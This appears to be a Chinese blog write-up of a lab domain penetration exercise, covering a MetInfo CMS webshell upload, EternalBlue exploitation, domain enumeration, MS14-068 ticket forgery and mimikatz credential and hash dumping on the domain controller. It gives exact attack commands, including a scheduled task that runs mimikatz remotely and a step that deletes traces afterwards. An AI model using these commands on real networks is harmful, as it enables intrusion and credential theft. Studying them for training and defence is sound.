记一次异常艰难的域靶场渗透

  • A+
所属分类:安全文章

记一次异常艰难的域靶场渗透

声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理

资源连接: 链接:https://pan.baidu.com/s/16W3APIySbxXiseJ57RPScw 提取码:xcnd


渗透要求及工具:

要求: 内存8G以上,需要五台虚拟机全开

目标:  最终拿到ser-dc1的域控权限

工具: 菜刀QuarksPwDump.exekalims14068

线索: 公网IP:192.168.100.50

思路: 1. dmz区 cms漏洞getshell,破解windows administrator密码

  1. 通过http代理和ew两种代理方式,对office进行扫描,并探测ms17010漏洞

  2. 通过抓取当前系统明文密码通过上传mimikatz 和  powershell 加载mimikatz两种方式进行提取

  3. 通过office区代理,探测域控

  4. 通过ms14068伪造域管权限对域控进行攻击

  5. 通过之前破解的linux区的密码测试域控弱口令进行攻击

  6. 通过at,sc,psexec 等几种方式对域控进行攻击

  7. 通过mimikatz 和 vssown两种方式提取域hash

环境搭建:

将下载好的文件解压然后虚拟机打开此文件夹,分别导入四台靶机并开机记一次异常艰难的域靶场渗透

将物理机的VMnet8网络地址改为192.168.100.1记一次异常艰难的域靶场渗透将物理机的VMnet19网络地址改为192.168.200.1记一次异常艰难的域靶场渗透完成后在浏览器中输入192.168.100.50即可访问该网站,渗透之路由此开始记一次异常艰难的域靶场渗透

渗透过程:

1、信息搜集

在网站底部看到是MetInfo 5.0.4 的网站管理系统记一次异常艰难的域靶场渗透百度到metinfo后台是admin,账号也是admin然后试了下弱密码admin123成功登录记一次异常艰难的域靶场渗透发现了一个上传点但是不能绕过,只能百度metinfo5.0.4的漏洞记一次异常艰难的域靶场渗透找到了漏洞利用方法,文章链接https://blog.csdn.net/key_book/article/details/80604830记一次异常艰难的域靶场渗透打開PHPstudy利用html文件上传一句话木马记一次异常艰难的域靶场渗透修改ip后php文件成功上传记一次异常艰难的域靶场渗透該文件也能访问得到记一次异常艰难的域靶场渗透

2、获取webshell

然后用菜刀连接,打开终端whoami查看权限是system,然后使用QuarksPwDump.exe获取管理员密码,具体方法请参照此文章记一次异常艰难的域靶场渗透在cmd5中解密记一次异常艰难的域靶场渗透然后使用代理工具反向连接,具体方法请参照此文章开启3389端口借助代理远程连接,具体方法请参照此文章记一次异常艰难的域靶场渗透

3、攻击office区

上传ip扫描工具,扫到192.168.1.102的一台机器记一次异常艰难的域靶场渗透然后nmap扫描看看开了哪些端口记一次异常艰难的域靶场渗透挂代理用msfconsole攻击win7记一次异常艰难的域靶场渗透輸入use exploit/windows/smb/ms17_010_eternalblue使用17010漏洞攻击,填好目标ip和攻击者ip即可记一次异常艰难的域靶场渗透成功后就会进入到meterpreter,由于环境问题攻击win7的部分就演示到这里,下面直接进入从win7拿域控权限记一次异常艰难的域靶场渗透

4、域内信息搜集

首先whoami看自己是否处在域环境记一次异常艰难的域靶场渗透然后ipconfig /all看到域名与域控ip记一次异常艰难的域靶场渗透ping这个ip拿到域控主机名记一次异常艰难的域靶场渗透我们可以输入nltest /dsgetdc:hacker /server:10.1.1.3核实一下信息记一次异常艰难的域靶场渗透输入net user /domain查看所有的域用户记一次异常艰难的域靶场渗透输入net group "domain admins" /domain获取域管理员列表记一次异常艰难的域靶场渗透輸入net group "domain controllers" /domain查看域控制器(如果有多台)

记一次异常艰难的域靶场渗透net group "domain computers" /domain杳看域机,器

记一次异常艰难的域靶场渗透net group /domain查询域里面的组记一次异常艰难的域靶场渗透net view查看同一-域内机器列表net view \10.1.1.3net view \WIN-0N3ST0ESE8L查看某机器共享资源列表net view /domain查看内网存在多少个域记一次异常艰难的域靶场渗透whoami /all获取SID记一次异常艰难的域靶场渗透通过tasklist /v查看进程用户,如果有域用户启的进程,则凭证窃取记一次异常艰难的域靶场渗透输入klist查看票据记一次异常艰难的域靶场渗透如果有就输入klist purge清除记一次异常艰难的域靶场渗透上传工具并进入目录记一次异常艰难的域靶场渗透

5、拿域控

输入14068py.exe -u [email protected] -p "123.com" -s S-1-5-21-1854149318-4101476522-1845767379-1107 -d WIN-0N3ST0ESE8L.hacker.com获取票据凭证,命令中的信息替换成前期搜集到的,然后当前目录会生成一个文件将文件名复制记一次异常艰难的域靶场渗透输入mimikatz.exe "kerberos::ptc [email protected]" exit生成票据记一次异常艰难的域靶场渗透klist查看数量为一则成功,输入dir \WIN-0N3ST0ESE8L.hacker.comc$即可查看域控机的共享目录,成功拿到域控记一次异常艰难的域靶场渗透

6、导出域hash

<font color="orae">方法一:使用mimikatz软件

进入mimikatz交互模式记一次异常艰难的域靶场渗透输入lsadump::dcsync /domain:hacker.com /user:administrator /csv获取域管的hash,换其他用户名即可获取其他用户hash记一次异常艰难的域靶场渗透

<font color="orae">方法二:使用at计划任务结合mimikatz直接获取明文密码

输入copy mimikatz.ese \WIN-0N3ST0ESE8L.hacker.comc$分别将这三个文件上传到目标服务器的c盘记一次异常艰难的域靶场渗透在同目录下创建1.bat文件,内容为mimikatz.exe privilege::debug sekurlsa::logonpasswords exit>1.txt记一次异常艰难的域靶场渗透輸入at \WIN-0N3ST0ESE8L.hacker.com 19:37 \WIN-0N3ST0ESE8L.hacker.comc$1.bat创建计划任务执行bat文件,注意时间一定要掌握好记一次异常艰难的域靶场渗透等时间到了以后输入type \WIN-0N3ST0ESE8L.hacker.comc$1.txt即可在生成的文件中看到获取的明文密码记一次异常艰难的域靶场渗透最後别忘了擦屁股将所有文件全部删除记一次异常艰难的域靶场渗透

长按♥一键关注
记一次异常艰难的域靶场渗透





记一次异常艰难的域靶场渗透



本文始发于微信公众号(爱国小白帽):记一次异常艰难的域靶场渗透

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: